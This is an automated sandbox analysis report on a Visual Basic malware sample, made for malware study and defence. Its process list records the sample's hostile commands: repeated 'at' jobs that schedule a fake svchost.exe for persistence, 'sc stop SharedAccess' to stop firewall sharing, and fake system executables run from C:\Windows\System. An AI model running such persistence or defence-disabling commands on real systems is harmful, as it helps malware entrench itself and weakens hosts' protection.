                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:17
                                                                                  Start time:09:09:27
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:18
                                                                                  Start time:09:09:28
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:19
                                                                                  Start time:09:09:28
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:20
                                                                                  Start time:09:09:29
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:21
                                                                                  Start time:09:09:29
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:22
                                                                                  Start time:09:09:29
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                  Imagebase:0x7ff7338d0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:23
                                                                                  Start time:09:09:30
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:24
                                                                                  Start time:09:09:30
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:25
                                                                                  Start time:09:09:31
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:26
                                                                                  Start time:09:09:31
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:27
                                                                                  Start time:09:09:31
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                  Imagebase:0x7ff7338d0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:28
                                                                                  Start time:09:09:32
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:29
                                                                                  Start time:09:09:32
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:30
                                                                                  Start time:09:09:32
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                  Imagebase:0x7ff7338d0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:31
                                                                                  Start time:09:09:33
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:32
                                                                                  Start time:09:09:33
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                  Imagebase:0x7ff7338d0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:33
                                                                                  Start time:09:09:33
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:34
                                                                                  Start time:09:09:34
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System\explorer.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\windows\system\explorer.exe" RO
                                                                                  Imagebase:0x400000
                                                                                  File size:281083 bytes
                                                                                  MD5 hash:A6F18E47BFFD6F5C4AA28B67644DBDBE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Visual Basic

                                                                                  Target ID:35
                                                                                  Start time:09:09:34
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:36
                                                                                  Start time:09:09:35
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:38
                                                                                  Start time:09:09:35
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:39
                                                                                  Start time:09:09:35
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                  Imagebase:0x7ff7338d0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:40
                                                                                  Start time:09:09:36
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:41
                                                                                  Start time:09:09:37
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:42
                                                                                  Start time:09:09:37
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:43
                                                                                  Start time:09:09:37
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:44
                                                                                  Start time:09:09:38
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:45
                                                                                  Start time:09:09:38
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                                  Imagebase:0x7ff7338d0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:46
                                                                                  Start time:09:09:38
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                  Imagebase:0x7ff7338d0000
                                                                                  File size:51288 bytes
                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:47
                                                                                  Start time:09:09:38
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:48
                                                                                  Start time:09:09:39
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:49
                                                                                  Start time:09:09:39
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:50
                                                                                  Start time:09:09:40
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:51
                                                                                  Start time:09:09:40
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:52
                                                                                  Start time:09:09:42
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\windows\system\svchost.exe" RO
                                                                                  Imagebase:0x400000
                                                                                  File size:281069 bytes
                                                                                  MD5 hash:B61A3DA9B4DB4644497B9CC1BE87515F
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:Visual Basic

                                                                                  Target ID:53
                                                                                  Start time:09:09:44
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\at.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:at 09:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
                                                                                  Imagebase:0xfc0000
                                                                                  File size:25088 bytes
                                                                                  MD5 hash:6E495479C0213E98C8141C75807AADC9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:54
                                                                                  Start time:09:09:45
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:sc stop SharedAccess
                                                                                  Imagebase:0xb50000
                                                                                  File size:60928 bytes
                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:55
                                                                                  Start time:09:09:45
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:56
                                                                                  Start time:09:09:45
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:sc config Schedule start= auto
                                                                                  Imagebase:0xb50000
                                                                                  File size:60928 bytes
                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                  Target ID:57
                                                                                  Start time:09:09:45
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff647620000
                                                                                  File size:625664 bytes
                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language

                                                                                    Execution Graph

                                                                                    Execution Coverage:2.5%
                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                    Signature Coverage:0.6%
                                                                                    Total number of Nodes:788
                                                                                    Total number of Limit Nodes:41
10405->10408 10406 4112af #631 __vbaStrMove #516 __vbaFreeStr __vbaFreeVar 10407 4115c9 __vbaErrorOverflow 10406->10407 10406->10412 10408->9960 10409 4113c8 #593 10409->10407 10409->10412 10410 4115c4 10410->10407 10411 411459 17 API calls 10411->10407 10411->10412 10412->10405 10412->10406 10412->10407 10412->10409 10412->10410 10412->10411 10414 415954 __vbaFreeStr 10413->10414 10414->9987 10416 415db3 10415->10416 10417 41247f __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 10415->10417 10418 415dc3 6 API calls 10416->10418 10419 415eb9 __vbaErrorOverflow 10416->10419 10417->10025 10418->10417 10420 415e0a __vbaLenBstr 10418->10420 10420->10419 10421 415e22 10420->10421 10421->10419 10422 415e39 __vbaLenBstr 10421->10422 10422->10419 10423 415e4e 10422->10423 10423->10419 10424 415e52 #631 __vbaStrMove __vbaFreeVar 10423->10424 10424->10417 10426 407395 10425->10426 10428 405d45 10427->10428 10430 405d8d 10429->10430 10432 406a19 10431->10432 10435 403670 #100 10436 403625 __vbaRaiseEvent 10435->10436 10437 40369a 10435->10437 10436->10435

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041E9EE
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA1E
                                                                                    • #525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA30
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA3B
                                                                                    • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041EA4C
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA61
                                                                                    • GetUserNameA.ADVAPI32(00000000), ref: 0041EA6D
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA7B
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA84
                                                                                    • #537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041EA99
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAA4
                                                                                    • __vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041EAAD
                                                                                    • #616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041EABD
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAC8
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAD1
                                                                                    • __vbaFreeStr.MSVBVM60(0041EB05,?,?,?,00000000,Function_000032B6), ref: 0041EAFE
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EB19
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$FreeMove$Error$#525#537#616AnsiBstrChkstkNameOverflowUnicodeUser
                                                                                    • String ID:
                                                                                    • API String ID: 281739284-0
                                                                                    • Opcode ID: 51ebf8c25856d226b4dcde5673b463cf0edb45b4d208a7711fc342866f12040b
                                                                                    • Instruction ID: 1a108948efa492097ea428c0624f2b892237f430c038d1a03950295591b49aee
                                                                                    • Opcode Fuzzy Hash: 51ebf8c25856d226b4dcde5673b463cf0edb45b4d208a7711fc342866f12040b
                                                                                    • Instruction Fuzzy Hash: 5D31CA75900249EFDB04EFA4DE4DBDEBBB8EB08715F108269E502B62A0DB745944CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0040A85E
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,Function_000032B6), ref: 0040A8B6
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040A91C
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000068), ref: 0040A97C
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040A9A5
                                                                                    • __vbaEnd.MSVBVM60 ref: 0040A9BD
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040A9DD
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040AA43
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,0000007C), ref: 0040AA9E
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040AAB9
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406300,000001BC), ref: 0040AAFD
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34), ref: 0040AB2F
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406510,00000014), ref: 0040AB95
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000050), ref: 0040ABF2
                                                                                    • #618.MSVBVM60(?,00000001), ref: 0040AC10
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040AC1B
                                                                                    • __vbaStrCmp.MSVBVM60(00406544,00000000), ref: 0040AC27
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040AC45
                                                                                    • __vbaFreeObj.MSVBVM60(?,?,Function_000032B6), ref: 0040AC51
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,Function_000032B6), ref: 0040AC80
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040ACE6
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000050), ref: 0040AD43
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040AD74
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040AD7D
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,Function_000032B6), ref: 0040ADA2
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040AE08
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000050), ref: 0040AE65
                                                                                    • __vbaStrCat.MSVBVM60(00406544,?), ref: 0040AE86
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040AE91
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040AE9A
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040AEA3
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040AEB8
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040AECC
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040AED9
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040AEE9
                                                                                    • __vbaStrMove.MSVBVM60(00000025,?,?,?,?,?,Function_000032B6), ref: 0040AF05
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 0040AF12
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,?,?,?,Function_000032B6), ref: 0040AF1B
                                                                                    • __vbaNew2.MSVBVM60(00406520,0042CC34,?,?,?,?,?,Function_000032B6), ref: 0040AF3B
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406510,00000014), ref: 0040AFA1
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00406530,00000058), ref: 0040AFFE
                                                                                    • __vbaStrCat.MSVBVM60(?,?), ref: 0040B01E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B029
                                                                                    • __vbaStrCat.MSVBVM60(00406BFC,00000000), ref: 0040B035
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040B040
